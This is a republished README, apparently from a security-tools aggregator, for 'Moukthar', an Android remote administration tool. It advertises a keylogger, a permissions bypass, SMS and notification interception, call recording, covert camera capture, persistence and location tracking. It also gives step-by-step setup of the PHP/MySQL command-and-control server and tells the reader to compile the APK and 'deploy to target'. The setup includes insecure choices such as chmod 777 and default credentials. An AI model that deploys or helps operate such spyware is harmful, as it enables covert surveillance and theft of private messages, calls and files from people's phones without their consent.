Moukthar – Android Remote Administration Tool

2ada38a8a78bb372f3a02a118c8500b6950b18dd5833d93f461ef81529cb0017


Remote adminitration tool for android

Features

  • Permissions bypass (android 12 below) https://youtube.com/shorts/-w8H0lkFxb0
  • Keylogger https://youtube.com/shorts/Ll9dNrkjFOA
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Video recording
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation

  • Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Install php, composer, mysql, php-mysql driver, apache2 and a2enmod
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web-socket/ composer install cd /var/www chown -R www-data:www-data . chmod -R 777 . The default credentials are username: android and password: android
  • Create new sql user mysql CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password'; GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost'; FLUSH PRIVILEGES;
  • Set database credentials in c2-server/.env and web-socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web-socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/sites-available/000-default.conf “`console ServerAdmin webmaster@localhost DocumentRoot /var/www/html/c2-server DirectoryIndex app.php Options -Indexes
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

- Modify/etc/apache2/apache2.confxml Comment this section # # Options FollowSymLinks # AllowOverride None # Require all denied #

Add this Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted - Increase php file upload max size/etc/php/./apache2/php.iniini ; Increase size to permit large file uploads from client upload_max_filesize = 128M ; Set post_max_size to upload_max_filesize + 1 post_max_size = 129M - Set web socket server address in <script> tag inc2-server/src/View/home.phpandc2-server/src/View/features/files.phpconsole const ws = new WebSocket(‘ws://IP_ADDRESS:8080’); - Restart apache using the command belowconsole sudo a2enmod rewrite && sudo service apache2 restart - Set C2 server and web socket server address in clientfunctionality/Utils.javajava public static final String C2_SERVER = “http://localhost”;

public static final String WEB_SOCKET_SERVER = “ws://localhost:8080”; “` – Compile APK using Android Studio and deploy to target

Screenshots

9c3a1350c00d887fb18fffc9358ce873d512a5b7a3c87d895559224b5a7baa96

aa1d06d0a4f5ed2e3c5815b263b087d4b0dd944f37f9a91d12b458883a19280c df289881f4a27ef3ba27f4824e8ca39411c29848d7fd98babbd4c8b223532d0d eea2b8f112c3c9ab0ec5ed17d625a512b896c2d65f6200bff996cd62f2b6f3eb 0a53e8fc6dfac5aff30a43aa64eb4832291de6deecbf6a835016b203fe5e93e5 5b1db367c3c882bad4609bbf6733f1d2c211c00144da2aa5a445fff3335b3a28 72ee1612e8a1f173f959f1261563125b0402b9abeeb0529071afb3e0a9e4d306 936fa60653444988f1d7ee10097ad43c1c111489e5f4e70b77bb69bdef5a615a 5315239b7a977989e20d4447cc3d9397ffd26903de918022775f3f6603e6e7f1

TODO

  • Auto scroll logs on dashboard
  • Screenshot not working
  • Image/Video capturing doesn’t work when application isn’t in focus
  • Downloading files in app using DownloadManager not working
  • Listing constituents of a directory doesn’t list all files/folders



Original Source: kitploit.com


A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

To keep up to date follow us on the below channels.